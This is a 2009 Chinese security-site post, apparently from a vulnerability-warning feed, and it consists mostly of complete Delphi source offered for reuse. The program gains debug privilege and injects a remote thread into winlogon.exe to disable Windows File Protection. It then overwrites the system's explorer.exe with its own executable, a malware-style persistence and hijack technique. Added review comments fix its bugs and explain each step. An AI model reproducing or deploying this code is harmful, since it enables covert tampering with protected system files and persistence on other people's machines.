Turn off XP file protection and replace explorer.exe - vulnerability warning - the black bar safety net

ID MYHACK58:62200921987
Type myhack58
Reporter 佚名
Modified 2009-01-18T00:00:00


Author: open Source: open's blog

Only tested on a VPC (Virtual PC) machine; not tested any further. It does not even touch the dllcache directory (the copy Windows File Protection restores from), so the replacement is not protected against being reverted. Take it if you like.


> {*********} { } { Turn off XP protection. Replace explorer.exe } { } { Copyright (C) 2008 bbs.secdst.net } { } {***********}

program Project1;

uses Windows,TlHelp32;

function LowerCase(const S: string): string;
// ASCII-only lower-casing of S. The program does not use SysUtils, so this
// stands in for SysUtils.LowerCase: only 'A'..'Z' are changed, every other
// byte (including any non-ASCII byte) is copied through untouched.
var
  I: Integer;
  C: Char;
begin
  SetLength(Result, Length(S));
  for I := 1 to Length(S) do
  begin
    C := S[I];
    if C in ['A'..'Z'] then
      Result[I] := Chr(Ord(C) + 32)   // 'A'..'Z' -> 'a'..'z' is a fixed offset of 32
    else
      Result[I] := C;
  end;
end;

function CreatedMutexEx(MutexName: PChar): Boolean;
// Single-instance guard. Creates (and initially owns) the named mutex and
// reports whether this process was the first to create it: False when
// CreateMutex succeeded but GetLastError is ERROR_ALREADY_EXISTS, i.e. another
// instance already holds the name; True otherwise.
// NOTE(review): the handle is deliberately never closed (the original has the
// CloseHandle commented out) - the mutex has to outlive this call so later
// instances still see it. A CreateMutex failure (handle 0) is also reported
// as True, i.e. "no other instance", which callers should keep in mind.
var
  Handle: THandle;
  AlreadyThere: Boolean;
begin
  Handle := CreateMutex(nil, True, MutexName);
  AlreadyThere := (Handle <> 0) and (GetLastError = ERROR_ALREADY_EXISTS);
  Result := not AlreadyThere;
end;

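function GetWinPath: string;
// Returns the Windows directory (e.g. 'C:\WINDOWS') with a trailing
// backslash so callers can append a file name directly.
// Returns '' when GetWindowsDirectory fails (0) or reports that the buffer
// was too small (value > MAX_PATH), instead of - as the original did -
// ignoring the return value, reading an uninitialised buffer and indexing
// position 0 of a possibly empty string.
var
  Buf: array[0..MAX_PATH] of Char;
  Len: Cardinal;
begin
  Result := '';
  Len := GetWindowsDirectory(Buf, MAX_PATH);
  if (Len = 0) or (Len > MAX_PATH) then
    Exit;
  Result := Buf;
  if (Result <> '') and (Result[Length(Result)] <> '\') then
    Result := Result + '\';
end;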

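function GetTempDirectory: string;
// Returns the temporary directory with a trailing backslash.
// Returns '' when GetTempPath fails (0) or reports a path longer than the
// buffer (value > MAX_PATH), instead of - as the original did - ignoring the
// return value, reading an uninitialised buffer and indexing position 0 of a
// possibly empty string.
// NOTE(review): nothing else in this listing calls this function.
var
  Buf: array[0..MAX_PATH] of Char;
  Len: Cardinal;
begin
  Result := '';
  Len := GetTempPath(MAX_PATH, Buf);
  if (Len = 0) or (Len > MAX_PATH) then
    Exit;
  Result := Buf;
  if (Result <> '') and (Result[Length(Result)] <> '\') then
    Result := Result + '\';
end;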

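function EnableDebugPriv: Boolean;
// Enables SeDebugPrivilege in the current process token. The program needs it
// to OpenProcess(PROCESS_ALL_ACCESS) on winlogon.exe; the privilege is only in
// the token of an administrator (or SYSTEM), so this - and the program - fails
// for a limited user.
// Returns True only when the privilege was actually enabled. The original
// trusted the AdjustTokenPrivileges return value, but that API returns TRUE
// even when it assigned nothing (GetLastError = ERROR_NOT_ALL_ASSIGNED); it
// also never checked OpenProcessToken (hToken used uninitialised on failure)
// and never closed the token handle.
var
  hToken: THandle;
  tp: TTokenPrivileges;
  rl: Cardinal;
begin
  Result := False;
  if not OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken) then
    Exit;
  try
    if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then
    begin
      tp.PrivilegeCount := 1;
      tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
      if AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, rl) then
        // TRUE is also returned when the token does not hold the privilege;
        // only the last-error value tells the two cases apart.
        Result := GetLastError <> ERROR_NOT_ALL_ASSIGNED;
    end;
  finally
    CloseHandle(hToken);
  end;
end;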

procedure InjectThread(ProcessHandle: DWORD);
// Injects into winlogon.exe to turn off XP's File Protection (per the
// original comment), so the explorer.exe swap done by the main block is not
// reverted. sfc_os.dll ordinal 2 is resolved in *this* process and its
// address is then started as a thread inside the target process. That only
// works if sfc_os.dll sits at the same base address in winlogon.exe
// (presumably already loaded there; XP has no ASLR), so the pointer is valid
// in the other process.
// Nothing is checked: a failed LoadLibrary/GetProcAddress leaves a nil start
// address, a CreateRemoteThread failure is ignored, the thread handle (oddly
// typed as HMODULE) is never closed, and a timeout of the 4000 ms wait is not
// reported. ProcessHandle must carry PROCESS_ALL_ACCESS on winlogon.exe,
// which is why EnableDebugPriv runs first.
var
  TID: LongWord;
  hSfc, hThread: HMODULE;
  pfnCloseEvents: Pointer;
begin
  hSfc := LoadLibrary('sfc_os.dll');
  pfnCloseEvents := GetProcAddress(hSfc, MAKEINTRESOURCE(2));
  // Freed before use on purpose: the address only has to be valid inside the
  // target process, not here.
  FreeLibrary(hSfc);
  hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
  // Give the remote routine up to 4 s to finish before the caller continues.
  WaitForSingleObject(hThread, 4000);
end;

procedure InitProcess(Name: string);
// Walks the process list (Toolhelp32 snapshot) for the first process whose
// image name, lower-cased, equals Name, opens it with PROCESS_ALL_ACCESS and
// hands the handle to InjectThread. Only the first match is used.
// Name must already be lower case (the caller passes 'winlogon.exe').
// NOTE(review): an OpenProcess failure is not detected, InjectThread would
// then receive handle 0.
var
  Snap: THandle;
  Entry: TProcessEntry32;
  Target: DWORD;
  HaveEntry: Boolean;
begin
  Snap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  Entry.dwSize := SizeOf(Entry);
  HaveEntry := Process32First(Snap, Entry);
  while HaveEntry do
  begin
    if LowerCase(Entry.szExeFile) = Name then
    begin
      Target := OpenProcess(PROCESS_ALL_ACCESS, False, Entry.th32ProcessID);
      InjectThread(Target);
      CloseHandle(Target);
      Break;
    end;
    HaveEntry := Process32Next(Snap, Entry);
  end;
  CloseHandle(Snap);
end;

const
  ExpFile = 'explorer.exe';
  MasterMutex = 'OpenSoul';   // name of the single-instance mutex

var
  s: string;

begin
  // Single instance: a second copy (e.g. the one later started as
  // explorer.exe) quits immediately if the mutex already exists.
  if not CreatedMutexEx(MasterMutex) then ExitProcess(0);
  // SeDebugPrivilege is needed to open winlogon.exe; quit when it cannot be
  // enabled (limited user).
  if not EnableDebugPriv then Exit;
  // Inject into winlogon.exe first to turn off XP's File Protection, so the
  // system does not restore the original explorer.exe after the swap below.
  InitProcess('winlogon.exe');
  // Own image path; decide whether this copy already *is* the explorer.exe
  // in the Windows directory (case-insensitive compare).
  s := ParamStr(0);
  if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then
  begin
    // Original idea, left disabled: move the running explorer.exe to
    // system32\explorer.exe first.
    //MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING);
    // Copy this executable over %WINDIR%\explorer.exe. bFailIfExists=False,
    // so the existing file is overwritten; the result is not checked. The
    // dllcache copy WFP restores from is not touched (see the author's note).
    CopyFile(PChar(S), PChar(GetWinPath + ExpFile), false);
  end;
  // Start what the author treats as the "real" explorer.exe from system32
  // (1 = SW_SHOWNORMAL). NOTE(review): with the MoveFileEx line disabled
  // nothing in this program puts a copy there, so this only works if
  // system32\explorer.exe already exists - verify on the target.
  WinExec(PChar(GetWinPath + 'system32\explorer.exe'), 1);
end.